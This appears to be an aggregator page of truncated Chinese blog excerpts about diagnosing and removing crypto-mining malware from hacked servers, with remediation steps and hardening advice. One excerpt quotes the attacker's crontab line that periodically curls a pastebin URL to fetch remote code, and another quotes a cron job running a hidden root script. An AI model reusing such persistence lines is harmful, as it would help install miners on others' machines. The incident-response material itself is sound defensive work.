背景: 突然有一天,服務器訪問很慢很慢,進程查看發現CPU是100%,而且沒有任何降低的意思 收集: 打開任務管理器,進程查看中CPU排序,發現一個System的進程,第一想法以為是空閑利用,發現結束掉之后瞬間又起來的 查了下描述中寫的“Xmrig miner ”,全是挖礦病毒,試了 ...
首先:又是經典的寶塔cpu 。 還是先看進程 pstree這次是正常的,沒看到異常的進程樹 然后 top 發現一個 ext 一個中括號的進程占用了 的cpu 我把這個進程單獨看了一下 top Hp PID 然后按了一下c,出現了這個。 進文件夾看看這又是個啥吧 病毒挖礦文件 sh文件: config.json文件,中間一段: 也不懂什么意思,就只能刪干凈一下,然后把那個進程kill PID 之后服 ...
2021-08-31 17:46 0 122 推薦指數:
背景: 突然有一天,服務器訪問很慢很慢,進程查看發現CPU是100%,而且沒有任何降低的意思 收集: 打開任務管理器,進程查看中CPU排序,發現一個System的進程,第一想法以為是空閑利用,發現結束掉之后瞬間又起來的 查了下描述中寫的“Xmrig miner ”,全是挖礦病毒,試了 ...
這幾天阿里雲雲服務器cpu一直跑滿,一查發現有個定時任務,在搜索一下,發現自己中毒了,原來前幾天搞redis學習的時候設置了個弱密碼,被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...
記錄一次解決挖礦病毒的過程(進程:susupdate,networkservice) 目錄 1.找出病毒進程 2.根據進程號找到運行文件的位置 3.刪除病毒進程 4.刪除病毒文件 4.1 文件無法正常刪除如何解決? 5. ...
服務器被植入挖礦,剛解決完,參考文章! 上午重啟服務的時候,發現程序啟動死慢,用top命令查看了一下,cpu被占用接近100%,所以無法運行新程序,通過top命令然后輸入P,就能看到有兩個程序幾乎占用了所有的CPU,占用率為700%左右,程序名稱為:minerd和AnXqV兩個,通過搜索知道 ...
Linux 服務器上有挖礦病毒處理 分析 今天遇到病毒挖礦,有點小興奮。 來波分析: 看上面的症狀是:攻擊者通過docker入侵的【后面了解,可能是redis賬號密碼簡單的原因被爆破的】 最奇詭的事,攻擊者可能通過提權,獲取到root的權限。然后一些列的挖礦病毒 大致流程圖 ...
一般情況下,挖礦病毒都是自動掃描+自動掛馬生成的,並不會是有專人進行攻擊,所以也比較好清除,注意清除之后需要 check 有無后門。 最重要幾點(也可能是被hack的原因):禁止 ROOT 用戶登陸,ROOT 不能使用弱密碼,FRP 需要配置,不能使用默認選項。 挖礦進程占用的 CPU 資源 ...
特征如下: CPU占用一直比較高,初步分析是挖礦程序: 系統的crontab –l顯示調度列表如下: 20 * * * * /root/.aliyun.sh >/dev/null 2>&1 查看腳本內容: #!/bin ...
處理過程: 1、查找異常進程,確定病毒進程,定位病毒腳本的執行用戶 2、殺掉病毒進程,注意要檢查清楚,病毒進程可能有多個,同時也要注意不要誤刪系統進程或者阿里雲的進程 3、檢查定時任務,一般都會有,以達到病毒自啟的效果,通過定時任務內容定位病毒腳本的位置,然后刪除病毒腳本 4、整改 ...